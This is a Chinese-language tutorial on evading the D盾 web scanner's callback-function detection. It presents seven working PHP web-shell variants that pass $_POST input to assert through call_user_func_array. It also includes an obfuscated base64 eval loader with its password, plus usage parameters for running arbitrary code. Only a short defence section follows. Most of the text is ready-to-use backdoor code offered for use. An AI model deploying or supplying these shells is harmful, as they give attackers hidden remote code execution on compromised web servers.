回调函数绕过D盾检测技术详解

一、背景介绍

D盾作为一款流行的Web安全防护软件，近期将所有回调函数都加入了黑名单，只要检测到回调函数就会报可疑。本文将详细介绍多种绕过D盾检测的技术方法。

二、常见被拉黑回调函数列表

以下是被D盾标记为可疑的回调函数：

call_user_func_array()
call_user_func()
array_udiff()
array_filter()
array_walk()
array_map()
array_reduce()
array_walk_recursive()
register_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()

三、绕过技术详解

1. 混淆加密绕过

示例代码：

<?php // This file is protected by copyright law & provided under license. Copyright(C) 2005-2009 www.vidun.com, All rights reserved.
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=128;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval((
$$
O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjYwKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXPkr9NTzEXHenNHtILT08XT08XHr8XhtONTznNTzEXHr8Pkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7eWpMfB5jfolvdJn2HeyjCB5vhtl7eWpZcbO1FM4ICbYzcbk0KX0hgW0hC2ySdy91F2aZb2c1dMYgCbkZCbLPfjExC2yVdZIpRoyZFMy5htOgAr9TaySmCUffhUL7eWP=

使用方法：

密码：a
工具：微盾PHP脚本加密专家

2. &&逻辑运算符绕过

原理：利用&&运算符从左到右执行的特性

示例代码：

<?php
    ($a = 'assert')&&($b = $_POST['a'])&&call_user_func_array($a, array($b));
?>

3. 命名空间绕过

方法：在回调函数前添加命名空间反斜杠

示例代码：

<?php
    \call_user_func_array('assert', array($_POST['a']));
?>

4. 函数封装绕过

方法：将回调函数封装在自定义函数中

示例代码：

<?php
    function v01cano($aaa,$bbb){
        call_user_func_array($aaa, $bbb);
    }
    v01cano('assert',array($_POST['a']));
?>

5. 自写加密函数绕过

方法：使用自定义加密函数隐藏敏感字符串

示例代码：

<?php
    function encode($para0){
        $m=strtolower($para0);
        $a = 7;
        $b = 21;
        $c = "";
        for($i=0;$i<strlen($m);$i++)
        {
            $c=$c.chr((((ord(substr($m,$i,1))-97)*$a+$b)%26)+97);
        }
        return $c;
    }
    $a = $_POST['a'];
    call_user_func_array(encode('xhhfsw'), array($a));
?>

6. 三元运算符绕过

方法：利用三元运算符干扰静态分析

示例代码：

<?php
    $a=$_GET['a'];
    $b=$_POST['a'];
    call_user_func_array($a==$a?$a:$a, array($b));
?>

使用方法：

URL参数：?a=assert
POST参数：a=执行的代码

7. 垂直制表符绕过

方法：使用特殊字符干扰检测

示例代码：

<?php
    $b=$_POST['a'];
    $a="\x0Bassert";
    call_user_func_array(trim($a), array($b));
?>

四、技术原理分析

D盾的检测机制存在以下特点：

对回调函数名称进行简单匹配
能够进行简单的变量值替换分析
无法处理复杂的运算和代换
对混淆加密的代码识别能力有限

五、防御建议

结合动态检测技术
加强对混淆代码的分析能力
建立更完善的函数调用关系分析
监控异常的函数调用模式

六、总结

本文详细介绍了7种绕过D盾回调函数检测的技术方法，展示了静态检测的局限性。安全防护需要向动态检测方向发展，建立更完善的防御体系。